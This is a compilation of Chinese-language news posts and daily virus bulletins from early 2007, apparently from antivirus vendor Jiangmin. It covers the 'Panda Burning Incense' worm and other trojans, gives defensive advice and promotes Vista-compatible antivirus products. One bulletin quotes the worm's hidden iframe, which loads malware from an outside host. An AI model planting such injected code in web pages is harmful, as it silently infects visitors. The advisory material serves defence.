江民 资讯 2007 正在整理中！

mamigo

超级病毒岁末年初肆虐互联网 追查“熊猫烧香”(图)

超级病毒岁末年初肆虐互联网，百万网民千家企业受害


　　■病毒档案

　　缉毒目标：Worm.WhBoy.h

　　中文名：“熊猫烧香”

　　病毒长度：可变

　　病毒类型：蠕虫

　　危害等级：★★★★

　　影响平台：Win9X/ME/NT/2000/XP/2003

　　2006年的圣诞节刚过，人们正沉浸在新年的气氛中，没有人会想到打开电脑后会撞上一个可怕的病毒。12月26日下午，正准备下班的江民、瑞星等杀毒厂商的工作人员陆续接到各地网民的求助电话。接下来的几天，求助者越来越多，从个人用户到企业用户，甚至有网吧业主哭诉数百台机器全部瘫痪。他们意识到，又一种可以与年度毒王相提并论的新病毒出现了。这个近期疯狂肆虐互联网，令上百万网民、上千家企业深受其害的病毒就是“熊猫烧香”。

　　超级病毒一月产生600余变种

　　“我的电脑瘫痪了，系统变得十分缓慢，什么都干不了。”“所有EXE文件的图标都变成了一只小熊猫在烧香。”一个又一个求助电话叙述的电脑中毒症状几乎全部相似。江民、瑞星、金山等国内杀毒厂商，甚至连卡巴斯基、趋势、赛门铁克等国外公司也纷纷加班分析病毒样本，并在第一时间推出专杀工具。但是，“熊猫烧香”的厉害程度显然超出反病毒工程师们的想象。在短短一周内，“熊猫烧香”出现超过50个变种。根据瑞星反病毒监测网统计的数据，截止到目前的一个月时间内，已经有600多个变种。“也就是说，即使杀毒软件升级得再及时，也会有新的变种出来逃过杀毒软件的阻拦。而且电脑一旦中毒，清除起来就很麻烦。” 一位反病毒工程师说。

　　“中毒”网友10万美元缉凶

　　据反病毒专家何公道介绍，来势汹汹的“熊猫烧香”病毒经诊断与之前的“威金”蠕虫病毒有着很大关系，而后者已被江民等公司列为2006年十大病毒之首，也就是俗称的“毒王”。对于这次跨年度的病毒发作，何公道认为其正是利用了人们在圣诞节和元旦前后放假期间的松懈而趁机作乱，等到用户发现的时候已经来不及查杀。

　　据了解，国内已有上千家企业级用户受到“熊猫烧香”的影响。一位数百台电脑集体瘫痪的网吧业主对记者说，无奈停业已造成数十万元损失，“想杀人的心都有”。在一些论坛上，不少受害网友强烈要求捉拿病毒作者。在百度“熊猫烧香”帖吧，“中毒”的网友愤怒地发帖，声明愿出10万美元通缉“熊猫烧香”作者。此举还是互联网反病毒历史上的第一次。

　　传播危害程度超过“冲击波”

　　“几年前造成大面积影响的‘冲击波’病毒，也只是造成了系统的不断重启，而现在的”熊猫烧香“却是不断删除和更改系统文件，并且由于变种速度极快，让人防不胜防。”一位反病毒工程师说。

　　据他介绍，导致“熊猫烧香”病毒快速传播的原因主要有三个：一是大量的企业用户使用国外杀毒软件，而国外杀毒软件对于此类国产病毒响应速度较慢。二是一部分网站编辑或网站管理人员本身机器感染了病毒，由于病毒能够修改HTML文件，当他们把受感染文件上传到服务器后，访问者点击此类受感染网页即中毒。

　　三是病毒综合利用了多种漏洞和传播途径，如利用微软MS06-014漏洞感染HTML文件，通过QQ最新漏洞传播，通过网络文件共享、默认共享、系统弱口令、U盘及移动硬盘等多种途径传播。局域网中一台机器感染，可以瞬间传遍整个网络。

　　这就是说，即使公司的数百台电脑都被断开了网络连接，但只要有一台电脑进行了光盘、移动硬盘或U盘等方式的数据输入，理论上都存在被感染病毒的可能。

　　据反病毒专家介绍，此次出现的“熊猫烧香”病毒及其变种一般只是大规模爆发感染用户电脑，病毒作者的意图似乎只是想证明自己的能力。不过，据了解，在本周刚刚截获的最新变种病毒中，已经出现了盗窃网络游戏账号的行为。“黑客”似乎有意变身“网络大盗”。

　　本版采写/本报记者焦集瑩

　　■传播方式

    植入网站借IE漏洞潜入用户电脑

　　接连两周，“熊猫烧香”的各个变种病毒在网上大肆传播，将所有感染的.exe文件图标换成“小熊猫”图案，还会修改部分文件，严重危害电脑用户的数据安全。

　　在安装了防火墙的企业局域网上，一旦用户访问IT门户或专业网站，这些网站上被种植的病毒就会利用IE浏览器的漏洞潜入用户电脑。根据监测，被“熊猫烧香”种植病毒的网站均在全球排名前300名之列，因此杀毒厂商估计目前已有上百万人受害。

　　这是一个由Delphi工具编写的蠕虫病毒，能够终止大量的反病毒软件和防火墙软件进程，病毒会删除扩展名为gho的文件，使用户无法使用ghost 软件恢复操作系统。“熊猫烧香”感染系统的*.exe、*.com、*.pif、*.src、*.html、*.asp文件，添加病毒网址，导致用户一打开这些网页文件，IE就会自动连接到指定的病毒网址中下载病毒。在硬盘各个分区下生成文件autorun.inf和setup.exe.病毒还可以通过U 盘和移动硬盘等方式进行传播，并且利用Windows系统的自动播放功能来运行。

　　“熊猫烧香”还可以修改注册表启动项，以使自身随操作系统同步运行。搜索硬盘中的*.EXE可执行文件并感染文件。该病毒还可以通过共享文件夹、系统弱口令等多种方式进行传播。

　　■缉毒行动

    杀毒厂商争相提供免费下载服务



    中毒电脑的许多执行文件变成“熊猫烧香”图标。

　　每到病毒大规模爆发之际都是反病毒公司施展拳脚之时。在去年12月底该病毒初显威力之时，江民、瑞星、金山等国内公司争先恐后推出了专杀工具，并且纷纷宣称免费提供给网民，几家公司的网络下载版也都提供了时间不等的免费使用功能。

　　但对于服务器设在国外的卡巴斯基、赛门铁克等公司，却由于光缆断裂无法及时升级而延误了“战机”，更新升级病毒库的速度明显不及国内反病毒厂商。

　　1月10日，江民开展了“新年无毒”大行动，实施三大举措：面向全国免费发放100万个月卡序列号；在江民网站免费提供一个月的江民杀毒软件下载；同时为部分城市企业用户提供免费上门杀毒等服务。

　　瑞星继续推行两个月的免费下载政策，并为那些使用国外杀毒软件而暂时无法升级的用户提供保障。

　　金山公司将该病毒等级列为“四星级重大”，并推出了一套整体解决方案。

　　同时金山毒霸还在第一时间内新增了对感染型流行病毒“熊猫烧香”的免疫能力。在服务期内的毒霸用户，将会通过金山毒霸的主动实时升级功能，自动升级到最新版本，实现对“熊猫烧香”的免疫。

　　■病毒追凶

    武汉15岁少年制造疯狂“熊猫”？

　　反病毒工程师在多个病毒代码解析时发现了“WHBOY”字样，因此怀疑该病毒与去年变种冠军“武汉男生”同出一源。

　　“武汉男生”自从2004年被截获后出现了上千变种，被江民反病毒中心列入2005年十大病毒之列，两种病毒变种之频繁以及传播手法几乎如出一辙。

　　目前这种病毒还只在国内范围感染，由此也可断定病毒作者出自国内。

　　来自百度帖吧等热烈讨论“熊猫烧香”的论坛中的信息显示，病毒作者有可能是武汉当地一位15岁的天才少年，他在得意地用自己的计算机技术对抗中外众多反病毒厂商。

　　而反病毒公司的监测也证实了这一点。江民公司策划部经理曹凌翔告诉记者：“前不久，作者在一个变种源代码中留言，表示将不再更新病毒，而从作者对一些安全论坛的熟悉程度来看，病毒作者在一些安全论坛也留下不少踪迹。”曹凌翔所指的痕迹是论坛中的一些言论。“在此对各位中过此木马的网友和各位网管人员表示深深的歉意！对不起，你们辛苦了！

　　很想和你们交流一下！某某原因，我想还是算了……“但从后来”熊猫烧香“再次出现大量变种的状况来看，病毒作者不是自食其言就是另有他人。

　　■自卫支招

    六招防范“熊猫”骚扰

　　反病毒专家提醒用户，已安装杀毒软件的用户建议立刻升级到最新病毒库，对电脑进行全盘查杀。

　　未安装杀毒软件的用户建议下载安装网上免费提供的熊猫烧香专杀工具，可以有效清除病毒和修复被感染文件。

　　与此同时，用户应该尽量做到：1、局域网用户尽量避免创建可写的共享目录，已经创建共享目录的应立即停止共享。

　　2、如无必要，Windows 2000/XP用户应尽量关闭IPC共享，并给具有管理员权限的账号设置可靠的密码。

　　3、及时安装微软的安全更新，不要随意访问来源不明的网站。特别是微软的MS06-014这一漏洞，应立即打好该漏洞补丁。

　　补丁下载地址：http：//www.microsoft.com/ china/technet/security/ bulletin/ms06-014.mspx 4、由于“熊猫烧香”病毒变种特别快，因此如果一些网上的专杀工具更新不及时的话，也未必能够及时清除一些新的变种病毒。这时候最好是使用一些未知病毒检测工具。

　　把“检测”结果中可疑概率很高（通常在60%以上）的文件删除。这种方法对付一些新的病毒变种十分有效。但要注意不要把正常文件删掉。

　　5、QQ用户请下载安装最新版本的QQ软件。目前已发现多起恶意网站利用QQ漏洞传播该病毒的现象。

　　6、开启杀毒软件的网页监控功能，使用U盘等移动设备交换文件时，要开启杀毒软件的实时监控，或先用杀毒软件扫描，并关闭自动播放功能。

　　关闭自动播放功能方法如下：在“开始”菜单的“运行”框中运行“gpedit. msc”命令，在“组策略”找到“计算机配置”和“用户配置”下的“管理模板”功能，打开其中的“系统”菜单中的“关闭自动播放”的设置，在其属性里面选择“已启用”，接着选择“所有驱动器”，最后确定保存即可。

mamigo

北京网络行业协会、江民科技联合发布01月28日病毒播报

江民2006大事记：
9月，江民特教园丁奖颁奖仪式在人民大会堂举行，来自我国中西部地区基层特殊教育学校的12名特教老师喜获殊荣。
9月，江民手机杀毒软件测试版本发布。
9月6日，北京江民新科技术有限公司成为首批当选中国名牌产品称号的企业。

江民今日提醒您注意：在今天的病毒中Worm/Viking.Html.a“熊猫烧香脚本”变种a和I-Worm/Warezov.Gen.g“龌龊虫”变种g值得关注。

病毒名称：Worm/Viking.Html.a
中 文 名：“熊猫烧香脚本”变种a
病毒长度：可变
病毒类型：蠕虫
危害等级：★★★
影响平台：Win 9X/ME/NT/2000/XP/2003
Worm/Viking.Html.a“熊猫烧香脚本”变种a是一个被“熊猫烧香”蠕虫病毒感染之后的网页脚本病毒。带毒网页被“熊猫烧香”蠕虫病毒注入一个iframe框架，框架内包含恶意网址引用 <iframe src=http://www.krvkr.com/***.htm width=0 height=0></iframe> ，导致当用户打开该网页后（如果IE浏览器没有打上补丁），IE就会自动下载并且执行恶意网址中的病毒体，此时被感染的计算机就会成为一个新的病毒传播源，进而感染局域网中的其他计算机。

病毒名称：I-Worm/Warezov.Gen.g
中 文 名：“龌龊虫”变种g
病毒长度：可变
病毒类型：蠕虫
危害等级：★★
影响平台：Win 9X/ME/NT/2000/XP/2003
I-Worm/Warezov.Gen.g“龌龊虫”变种g是一个利用群发带毒邮件进行传播的网络蠕虫。“龌龊虫”变种g运行后，自我复制到系统目录下，文件名由10个任意字母组成，后缀是.exe。弹出虚假升级成功信息框。修改注册表，实现开机自启。在Windows目录下释放病毒文件。强行篡改IE浏览器设置，连接指定站点，下载病毒文件。从被感染计算机上搜索有效邮箱地址，群发带毒邮件。

针对以上病毒，江民反病毒中心建议广大电脑用户：

    1、请立即升级江民杀毒软件，开启新一代智能分级高速杀毒引擎及各项监控，防止目前盛行的病毒、木马、流氓软件（恶意软件）等攻击用户计算机。
    2、江民KV网络版的用户请及时升级控制中心，并建议相关管理人员在适当时候进行全网查杀病毒，保证企业信息安全。
    3、局域网用户尽量避免创建可写的共享目录，已经创建共享目录的应立即停止共享。
    4、及时安装微软的安全更新，不要随意访问来源不明的网站。特别是微软的MS06-014漏洞，应立即打好该漏洞补丁。补丁下载地址：http: //www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx
    5、QQ用户请下载安装最新版本的QQ软件，已发现多起恶意网站利用QQ漏洞传播熊猫蠕虫的现象。
    6、使用U盘等移动设备交换文件时，要开启杀毒软件的实时监控，或先用杀毒软件扫描，并关闭自动播放功能。
    7、江民熊猫烧香专杀工具下载地址：http://www.jiangmin.com/download/zhuansha04.htm
    8、请勿随意打开邮件中的附件，尤其是来历不明的邮件。
    9、怀疑已中毒的用户可使用江民免费在线查毒进行病毒查证。免费在线查毒地址：http://online.jiangmin.com/chadu.asp.

  有关更详尽的病毒技术资料请直接拨打江民公司的技术服务热线800-810-2300和010-82511177进行咨询，或访问江民网站http://www.jiangmin.com进行在线查阅。

mamigo

北京网络行业协会、江民科技联合发布01月31日病毒播报

江民2006大事记：
9月，江民特教园丁奖颁奖仪式在人民大会堂举行，来自我国中西部地区基层特殊教育学校的12名特教老师喜获殊荣。
9月，江民手机杀毒软件测试版本发布。
9月6日，北京江民新科技术有限公司成为首批当选中国名牌产品称号的企业。

江民今日提醒您注意：在今天的病毒中Backdoor/Codbot.be“酷波”变种be和Trojan/Agent.cds“代理木马”变种cds值得关注。

病毒名称：Backdoor/Codbot.be
中 文 名：“酷波”变种be      
病毒长度：可变
病毒类型：后门
危害等级：★★
影响平台：Win 9X/ME/NT/2000/XP/2003
Backdoor/Codbot.be“酷波”变种be是一个利用Kazaa共享及mIRC传播的后门。该后门不仅传播给已经感染后门的用户计算机，而且利用密码字典破解弱密码进行网络共享传播。“酷波”变种be运行后，自我复制到系统目录下。修改注册表，实现开机自启。在Kazaa上创建共享目录，利用某些常用软件的名称自我复制到Kazaa共享目录下，欺骗他人下载。连接指定的IRC服务器，侦听黑客指令，上传或下载升级文件，终止某些杀毒软件的进程，对指定目标执行DoS攻击等。在已开启的窗口中搜索与网上银行、在线支付相关的字符串，一经发现便开始记录键击，盗取用户账号密码，并禁止用户通过合法账号进行在线交易。利用密码字典破解弱密码共享，自我复制到共享目录下，进行网络共享传播。该后门还利用多个微软漏洞进行传播。另外，“酷波”变种be 释放另一病毒，隐藏自我，防止被查杀。

病毒名称：Trojan/Agent.cds
中 文 名：“代理木马”变种cds      
病毒长度：248860字节
病毒类型：木马
危害等级：★
影响平台：Win 9X/ME/NT/2000/XP/2003
Trojan/Agent.cds“代理木马”变种cds是一个专门盗取网络游戏“热血江湖”玩家机密信息的木马。“代理木马”变种cds运行后，在系统目录下释放病毒文件，文件名随机生成，后缀是.dll。修改注册表，实现开机自启。在活动窗口中搜索与“热血江湖”主题相关的窗口，一经发现便开始记录键击，盗取玩家帐户密码等机密信息（玩家职业、等级、游戏分值），利用SMTP将盗取的密码发送给黑客。

针对以上病毒，江民反病毒中心建议广大电脑用户：

    1、请立即升级江民杀毒软件，开启新一代智能分级高速杀毒引擎及各项监控，防止目前盛行的病毒、木马、流氓软件（恶意软件）等攻击用户计算机。
    2、江民KV网络版的用户请及时升级控制中心，并建议相关管理人员在适当时候进行全网查杀病毒，保证企业信息安全。
    3、针对目前许多病毒文件采用进程保护技术，江民杀毒软件在右键菜单中的重启删除可疑文件功能，重启删除正常模式下无法删除的可疑文件，方便高级用户手工清除病毒。
    4、设置网络共享帐号及密码时，尽量不要使用空密码和常见字符串，如guest、user、administrator等。密码最好超过八位，尽量复杂化。
    5、“江民密保”可有效保护网上银行、支付平台、网上证券交易、网络游戏等账号密码，全面保护用户私密信息。
    6、开启江民杀毒软件“系统漏洞检查”功能，全面扫描操作系统漏洞，及时更新Windows操作系统，安装相应补丁程序，以避免病毒利用微软漏洞攻击计算机，造成损失。
    7、江民杀毒软件的“系统监控”功能，从注册表、系统进程、内存、网络等多方面对各种操作行为进行主动防御，可以第一时间监控未知病毒入侵，全方位保护用户计算机系统安全。
    8、请定期做好重要资料的备份，以免造成重大损失。
    9、怀疑已中毒的用户可使用江民免费在线查毒进行病毒查证。免费在线查毒地址：http://online.jiangmin.com/chadu.asp.

  有关更详尽的病毒技术资料请直接拨打江民公司的技术服务热线800-810-2300和010-82511177进行咨询，或访问江民网站http://www.jiangmin.com进行在线查阅。

mamigo

北京网络行业协会、江民科技联合发布01月30日病毒播报

江民2006大事记：
9月，江民特教园丁奖颁奖仪式在人民大会堂举行，来自我国中西部地区基层特殊教育学校的12名特教老师喜获殊荣。
9月，江民手机杀毒软件测试版本发布。
9月6日，北京江民新科技术有限公司成为首批当选中国名牌产品称号的企业。

江民今日提醒您注意：在今天的病毒中TrojanDownloader.Agent.fzm“代理木马”变种fzm和TrojanProxy.Horst.geq“地垒”变种geq值得关注。

病毒名称：TrojanDownloader.Agent.fzm
中 文 名：“代理木马”变种fzm      
病毒长度：53248字节
病毒类型：木马下载器
危害等级：★
影响平台：Win 9X/ME/NT/2000/XP
TrojanDownloader.Agent.fzm“代理木马”变种fzm是一个利用群发带毒邮件进行传播的木马程序。“代理木马”变种fzm运行后，自我复制到Windows目录下，文件名随机生成，后缀是.com。修改注册表，实现开机自启。从Microsoft Outlook地址簿里搜索有效邮箱地址，利用被感染计算机群发带毒邮件。

病毒名称：TrojanProxy.Horst.geq
中 文 名：“地垒”变种geq      
病毒长度：可变
病毒类型：木马
危害等级：★★
影响平台：Win 9X/ME/NT/2000/XP/2003
TrojanProxy.Horst.geq“地垒”变种geq是一个利用被感染的计算机转发垃圾邮件的木马。“地垒”变种geq运行后，终止某些杀毒软件和防火墙的服务。创建文件svchost.exe，并自我注入到该进程里，逃避杀毒软件的查杀。修改注册表，躲避Windows防火墙的监视。窃取被感染的计算机上有效的邮箱地址，并将地址加密压缩，通过UDP 7975端口发送到黑客指定站点。开启后门，允许黑客未经授权访问用户计算机，通过TCP 80端口连接指定IRC服务器，利用被感染的计算机转发垃圾邮件。从黑客指定站点下载其它盗号木马，并在被感染的计算机上自动运行。另外，“地垒”变种 geq还可以利用网络共享进行传播。

针对以上病毒，江民反病毒中心建议广大电脑用户：

    1、请立即升级江民杀毒软件，开启新一代智能分级高速杀毒引擎及各项监控，防止目前盛行的病毒、木马、流氓软件（恶意软件）等攻击用户计算机。
    2、江民KV网络版的用户请及时升级控制中心，并建议相关管理人员在适当时候进行全网查杀病毒，保证企业信息安全。
    3、针对目前许多病毒文件采用进程保护技术，江民杀毒软件在右键菜单中的重启删除可疑文件功能，重启删除正常模式下无法删除的可疑文件，方便高级用户手工清除病毒。
    4、江民杀毒软件的“系统监控”功能，从注册表、系统进程、内存、网络等多方面对各种操作行为进行主动防御，可以第一时间监控未知病毒入侵，全方位保护用户计算机系统安全。
    5、江民杀毒软件“垃圾邮件识别”功能可以智能过滤病毒垃圾邮件、广告垃圾邮件，使用户远离垃圾邮件的烦恼。
    6、请勿随意打开邮件中的附件，尤其是来历不明的邮件。
    7、企业级用户可在通用的邮件服务器平台开启江民无毒邮件监控系统，在邮件网关处拦截病毒，确保邮件客户端的安全。
    8、在运行通过网络共享下载的软件程序之前，建议先进行病毒查杀，以免导致中毒。
    9、怀疑已中毒的用户可使用江民免费在线查毒进行病毒查证。免费在线查毒地址：http://online.jiangmin.com/chadu.asp.

  有关更详尽的病毒技术资料请直接拨打江民公司的技术服务热线800-810-2300和010-82511177进行咨询，或访问江民网站http://www.jiangmin.com进行在线查阅。

mamigo

北京网络行业协会、江民科技联合发布01月29日病毒播报

江民2006大事记：
9月，江民特教园丁奖颁奖仪式在人民大会堂举行，来自我国中西部地区基层特殊教育学校的12名特教老师喜获殊荣。
9月，江民手机杀毒软件测试版本发布。
9月6日，北京江民新科技术有限公司成为首批当选中国名牌产品称号的企业。

江民今日提醒您注意：在今天的病毒中Trojan/PSW.Delf.lj“Trojan/PSW.Delf”变种lj和TrojanDropper.Agent.aip“代理木马”变种aip值得关注。

病毒名称：Trojan/PSW.Delf.lj
中 文 名：“Trojan/PSW.Delf”变种lj      
病毒长度：可变
病毒类型：木马
危害等级：★
影响平台：Win 9X/ME/NT/2000/XP/2003
Trojan/PSW.Delf.lj“Trojan/PSW.Delf”变种lj是一个利用移动设备进行传播的木马程序。 “Trojan/PSW.Delf”变种lj运行后，在系统目录下创建病毒副本，属性设置为隐藏。修改注册表，实现开机自启。终止与安全相关的进程和服务，删除与安全相关的注册表项，降低被感染计算机上的安全设置。搜索被感染计算机上的移动设备，一经发现便自我复制到移动硬盘根目录下，并自动运行。侦听黑客指令，盗取即时通讯工具QQ用户的密码，利用自带的SMTP将机密信息发送到黑客指定的邮箱里。另外，“Trojan/PSW.Delf”变种lj还可以自升级。

病毒名称：TrojanDropper.Agent.aip
中 文 名：“代理木马”变种aip      
病毒长度：可变
病毒类型：木马释放器
危害等级：★
影响平台：Win 9X/ME/NT/2000/XP/2003
TrojanDropper.Agent.aip“代理木马”变种aip是一个从黑客指定站点下载特定文件的木马释放器。“代理木马”变种aip运行后，在系统目录下释放.dll病毒文件。修改注册表，实现开机自启。将病毒文件注入到特定的进程中，隐藏自我，防止被查杀。侦听黑客指令，连接指定站点，下载特文件，盗取被感染用户计算机上的机密信息，并将机密信息发送到黑客指定站点。

针对以上病毒，江民反病毒中心建议广大电脑用户：

    1、请立即升级江民杀毒软件，开启新一代智能分级高速杀毒引擎及各项监控，防止目前盛行的病毒、木马、流氓软件（恶意软件）等攻击用户计算机。
    2、江民KV网络版的用户请及时升级控制中心，并建议相关管理人员在适当时候进行全网查杀病毒，保证企业信息安全。
    3、江民杀毒软件“移动存储接入杀毒”能杜绝病毒利用移动设备（如：U盘、移动硬盘等）入侵用户计算机，完全保护计算机系统安全。
    4、江民杀毒软件的“系统监控”功能，从注册表、系统进程、内存、网络等多方面对各种操作行为进行主动防御，可以第一时间监控未知病毒入侵，全方位保护用户计算机系统安全。
    5、“江民密保”可有效保护网上银行、支付平台、网上证券交易、网络游戏等账号密码，全面保护用户私密信息。
    6、针对目前许多病毒文件采用进程保护技术，江民杀毒软件在右键菜单中的重启删除可疑文件功能，重启删除正常模式下无法删除的可疑文件，方便高级用户手工清除病毒。
    7、怀疑已中毒的用户可使用江民免费在线查毒进行病毒查证。免费在线查毒地址：http://online.jiangmin.com/chadu.asp.

  有关更详尽的病毒技术资料请直接拨打江民公司的技术服务热线800-810-2300和010-82511177进行咨询，或访问江民网站http://www.jiangmin.com进行在线查阅。

mamigo

“熊猫烧香”又出新变种 新春谨防“金猪”来报喜

1月30日，江民科技反病毒中心监测到，肆虐互联网的“熊猫烧香”又出新变种。此次变种把“熊猫烧香”图案变成“金猪报喜”（图）。江民反病毒专家提醒用户，春节临近，谨防春节期间病毒借人们互致祝福之际大面积爆发。

mamigo

江民反病毒工程师剿杀“熊猫烧香”病毒全程实录

“熊猫烧香”疯狂发作

   2007年1月15日上午，中关村数码大厦32 层，江民科技反病毒中心。
最近一段时间，江民科技的几部反病毒热线始终没有停下来过，有很多用户打电话询问同一种病毒的查杀方法，这种病毒有一个最显著的特点－中毒电脑的可执行程序图标都会变成一只熊猫举着三炷香的样子，也就是最近正在互联网大范围流窜的蠕虫病毒－“熊猫烧香”。此病毒最早现身于2006年10月，最近正处于急速变种期，再加上这个病毒利用多种漏洞和途径大肆传播，因此中毒用户也急速增加。对于用户打来的每一个电话，江民科技的工程师都会详细耐心的给出解决方案，指导用户如何彻底查杀此病毒。

  “铃，铃，铃。。。。。。” 刚刚放下的电话又响了起来，江民科技的工程师立即接取电话询问：“你好！这里是江民科技，请问有什么需要服务的吗？”

   “啊！你好！是江民公司吧？我这边中毒了！网都瘫痪了，你们快来帮帮我吧！”对方的声音显得很焦急。

   “您先别着急，请说一下你那边的情况，有什么异常的现象吗？”江民科技的工程师耐心的询问着。

   “是这样，今天一早上，我就发现我们服务器的文件都不能运行了，图标都变成一个熊猫的样子，接着网速就很慢，现在基本上局域网都瘫痪了！”

   “哦，那你们中的可能是最近流行的‘熊猫烧香’蠕虫病毒，请问你们用的是那款杀毒软件和病毒库的日期？”江民科技的工程师进一步了解用户的情况。

   “哎呀！我们公司刚刚组建完网络，还没装杀毒软件呢！这不就中了嘛！你们能派工程师来我们这里处理一下吗？十分感谢！”

   “哦，那好，请您留下联系方式，我们会立即派人去部署一下杀毒软件，彻底清除您们网络中的病毒。” 江民科技的工程师记下了对方的地址，立即启程，又一次的展开了紧迫的反病毒任务。

    全网尽烧熊猫香  

   江民科技的工程师立刻就赶到用户那里，在一台服务器上发现里面的工具软件都已经被“熊猫烧香”蠕虫病毒感染了，如图1：

   图1 被“熊猫烧香”病毒感染之后的文件


   在进程中出现一个名为 spoclsv.exe 的可疑进程，如图2：

图2.jpg  “熊猫烧香”病毒进程
   在注册表中，有一个名为svcshare 的可疑启动项，如图3：

图3 “熊猫烧香”病毒启动项

   此外，还在硬盘跟目录下面发现了两个隐藏属性的可疑文件：

图4  “熊猫烧香”病毒还可以通过U盘传播

   显然，这样当用户双点打开E盘时，病毒文件就会激活运行。
还有，在一些文件夹里面出现了名为Desktop_.ini 的文件，里面有一个时间戳：如2007-1-15，这是标记着病毒的发作日期。如图5

图5
  从这些迹象可以看出，用户中的是典型的“熊猫烧香”蠕虫病毒，此时用户也在旁边询问：“怎么办？请帮忙一定把病毒杀干净！”江民科技的工程师坚定地回答说：“请放心！你的电脑是由于没有装杀毒软件，这才给病毒留下空隙的，我现在给你安装一套KV杀毒软件，很容易就能将病毒杀干净！而且你这里是一个局域网环境，就部署一下KV网络版吧！”
于是江民科技的工程师采用KV杀毒软件网络版独有的WEB方式安装，不出一小会，几十个节点的网络版杀毒软件便部署完毕，并且在进行了全网病毒库统一升级之后，下达了全网同时杀毒指令，如图6，立刻，这台服务器的病毒就彻底清除完毕了，如图7：

mamigo

微软5亿美元推Vista系统 杀毒厂商紧抓市场先机

1月30日，历时5年，耗资60亿美元，集6000名软件工程师研发力量于一身的微软重量级产品Vista个人版正式全球发布。据国外媒体报道，在微软Vista操作系统于全球范围上市的同时，还启动了规模浩大的Vista市场推广活动，营销资金总额高达5亿美元。

   Vista的到来为整个IT产业的蓬勃发展产生了巨大的推动作用，目前，整个IT业界都在联手微软，为现有的数百万硬件、软件和外设提供基于Vista系统的技术支持，同时还在针对Vista的最新特性开发新的硬件、软件和服务。

   作为国内最大的计算机反病毒厂商北京江民新科技术有限公司，紧紧抓住了市场的先机，凭借其十年来积聚的强大技术实力，率先研发出国内首款能够与 Vista系统全面兼容的杀毒软件，并于2月1日紧随微软正式发布。新版的KV2007，能够全面提升VISTA的安全性能，与Vista系统完全顺畅兼容，使用户在Vista系统下无障碍地安装、升级江民杀毒软件，为Vista用户的安全保驾护航。

   据了解，江民公司早在去年的11月份就宣布与微软合作开发全面支持Vista的杀毒软件，并凭借其雄厚的技术实力及研发人员的辛勤劳动，在不到两个月的时间里就成功地开发出与之完全兼容的杀毒软件，结束了微软Vista没有安全软件的历史。

   与微软之前几个操作系统不同的是，中国研发团队成为Vista多项技术的研发主力军。在刚刚发布的VISTA操作系统中，诸如TTS语音合成系统、 GameExplorer、支持超过七万汉字的超大字符集(比XP多5万)、微软雅黑字体、少数民族语言支持、中文域名、中文搜索、中文分组、以及中文语音识别等都是中国研发团队的“结晶”。同时，微软新增了名为“Windows Sidebar”的功能。Windows Sidebar主要是帮助用户轻松操作需要频繁访问的应用程序及信息，提供幻灯片播放、电影播放、RSS或接收其它实时信息等功能。用户通过使用 Sidebar与Gadget，可以为Vista添加一些驻留在电脑桌面右侧的小工具。这些工具大都很实用，或显示时间、气温，或提供小游戏消遣，完全不会影响到计算机用户的工作。Gadget体现了当今互联网趋势中的工具功能核心，它将完全模糊线上和本机的界限，颠覆用IE看内容的常规。目前， VISTA系统软件针对不同用户的四个版本已经上架，价格最低的一款定价2000元，最高2600元。

   另据江民公司介绍，新版VISTA杀毒软件不日即可在全国各地软件店面购买，老用户也可以使用尚在授期服务期内的通行证从网上免费下载安装，体验江民科技带来的舒畅安全保障。

    江民研发VISTA杀毒软件时间表：

    2006年12月，微软正式发布VISTA企业版，同期江民科技宣布国内首家研发成功并进入公测阶段。

    2007年1月30日，微软正式发布VISTA家庭版，1月31日，江民科技宣布正式发布江民杀毒软件KV2007VISTA版。

mamigo

紧随微软 江民正式发布支持VISTA系统的杀毒软件

2月1日，国内最大的计算机反病毒厂商江民科技宣布，正式发布国内首款全面支持微软Vista系统的杀毒软件，填补了目前安全软件普遍无法兼容Vista的市场空白。江民公司此次紧随微软发布与微软Vista全面兼容的杀毒软件，充分地显示出其雄厚的技术研发实力，同时也使我国众多VISTA爱好者不必再为缺少杀毒软件的保护而担忧。

   据悉，早在去年11月初，江民公司就宣布与微软合作开发支持Vista的杀毒软件，12月份产品研发成功并进入公测阶段，从而否定了业界流传的微软封杀杀毒软件的论调。江民科技总裁常进喜介绍，在微软提供的技术资料下，江民科技研发部只用了不到两个月的时间，就成功开发了全面兼容Vista的杀毒软件，这是与微软的支持以及江民研发人员的辛勤劳动密不可分的。

   Vista是微软从2001年开始研发，耗资60亿美元，集6000名软件工程师的研发心血于一身，研发过程长达5年的重量级产品，是继 Windows95推出10多年以来最重要的操作系统。它为用户提供了一个能更有效管理爆炸性数位媒体，提高网际网路安全的个人电脑（PC）作业系统。其最明显的改变，就是它的新风貌，为用户提供简明清晰的视觉体验。Vista的Aero介面运用3D图像，创造了透明视窗，看来好像浮在背景屏幕上。在令用户享受视觉震撼的同时，Vista也极大地方便了用户的使用。它可以帮助用户轻松地创造和分享数字内容，如照片、音乐、视频等，并通过发布博客、创建网站或在线游戏等方式参与数字社区的活动。

   安全性则是Vista的最大亮点。Vista安全中心集成了微软防火墙、专杀间谍软件Windows Defender等安全组件，并且应用了一种PatchGuard的内核保护技术，这一技术能够阻止病毒和木马对内核的修改。除此之外，微软Vista的另一重要安全举措就是应用了数字签名技术，这一技术使得凡是需要在Vista内核运行的程序都需要通过系统的数字签名认证才能放行，否则只能运行在系统的应用层，借此来防范越来越猖狂的木马和蠕虫。

   作为国内权威反病毒厂商北京江民新科技术有限公司，本着对用户负责、服务至上的原则，全新推出的与微软Vista全面兼容的杀毒软件，可以让用户在体验 Vista带来的震撼与惊叹之时，免受病毒和黑客的骚扰，更好地提升Vista的安全性，真正地实现上网的安全无忧。据悉，江民杀毒软件Vista版不日即可在全国各地软件店面上架销售，而老用户可以使用尚在服务期内的通行证从网上免费下载安装，来体验江民科技为你带来的全方位安全保障。

   江民研发VISTA杀毒软件时间表：

2006年11月30，微软正式发布VISTA企业版，同期江民科技宣布国内首家研发成功VISTA杀毒软件并进入公测阶段。

    2007年1月30日，微软正式发布VISTA家庭版，2月1日，江民科技宣布正式发布江民杀毒软件KV2007VISTA版。

mamigo

江民VISTA杀毒软件正式发布，VISTA不再“裸奔”

2月1日，国内最大的计算机反病毒厂商江民科技正式发布VISTA版杀毒软件，结束了国内VISTA电脑用户缺少安全软件防范的历史。

